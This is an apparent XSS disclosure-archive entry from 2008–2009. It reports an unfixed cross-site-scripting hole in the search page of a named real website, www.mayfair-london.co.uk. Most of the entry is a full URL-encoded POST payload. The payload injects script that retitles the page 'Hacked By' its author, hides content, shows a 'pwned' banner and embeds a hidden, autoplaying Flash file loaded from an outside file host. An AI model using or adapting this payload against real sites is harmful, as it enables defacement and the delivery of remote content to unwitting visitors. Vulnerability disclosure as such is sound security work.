Security researcher Dialogitec ImeCiQ, has submitted on 21/08/2008 a cross-site-scripting (XSS) vulnerability affecting www.mayfair-london.co.uk, which at the time of submission ranked 1179531 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/08/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/08/2008 |
Date published: 21/08/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: Dialogitec ImeCiQ |
Domain: www.mayfair-london.co.uk |
Category: XSS |
Pagerank: 1179531 |
URL: http://www.mayfair-london.co.uk/search.php |
POST: keyword=%3Cscript%3Edocument.title%3D%22Hacked+By+Dialogitec+ImeCiQ%22%3B%3C%2Fscript%3E%3Cstyle+typ e%3D%22text%2Fcss%22%3Ebody+%7B+background-image%3A+url%28%22http%3A%2F%2Fcontent27.bigoo.ws%2Fconte nt%2Fbackground%2Fanimated%2Fanimated_60.gif%22%29%3B+%7D+table+%7B%09visibility%3Ahidden%3B+%7D+.pi cture+%7B+visibility%3Avisible%3B+color%3A%23FF0000%3B+font-size%3A18px%3B+%7D%3C%2Fstyle%3E%3Cdiv+a lign%3D%22center%22+class%3D%22picture%22%3E%3Cimg+src%3D%22http%3A%2F%2Fimg262.imageshack.us%2Fimg2 62%2F7526%2Fbannerdefkz4.jpg%22+alt%3D%22pwned%22+%2F%3E%3Cp%3E%3Ch1%3EHacked+By+Dialogitec+ImeCiQ%3 C%2Fh1%3E%3C%2Fdiv%3E%3C%2Fp%3E%3Cobject+classid%3D%22clsid%3AD27CDB6E-AE6D-11cf-96B8-444553540000%2 2+codebase%3D%22http%3A%2F%2Fdownload.macromedia.com%2Fpub%2Fshockwave%2Fcabs%2Fflash%2Fswflash.cab% 23version%3D6%2C0%2C40%2C0%22+id%3D%22myMovieName%22+width%3D%221%22+height%3D%221%22%3E%3Cparam+nam e%3D%22movie%22+value%3D%22http%3A%2F%2Fwww.fasterupload.com%2Ffiles%2F6h62k7pami0s6kgwgy5v.swf%22%3 E%3Cembed+src%3D%22http%3A%2F%2Fwww.fasterupload.com%2Ffiles%2F6h62k7pami0s6kgwgy5v.swf%22+hidden%3D %22true%22+autostart%3D%22true%22+loop%3D%22true%22+width%3D%221%22+height%3D%221%22%3E%3Cnoembed%3E %3Cbgsound+src%3D%22http%3A%2F%2Fwww.fasterupload.com%2Ffiles%2F6h62k7pami0s6kgwgy5v.swf%22+loop%3D% 22infinite%22%3E%3C%2Fnoembed%3E%3C%2Fembed%3E%3C%2Fobject%3E&search1.x=27&search1.y=11&location_id= 0&category_id=0 |
Click here to view the mirror
|
|
|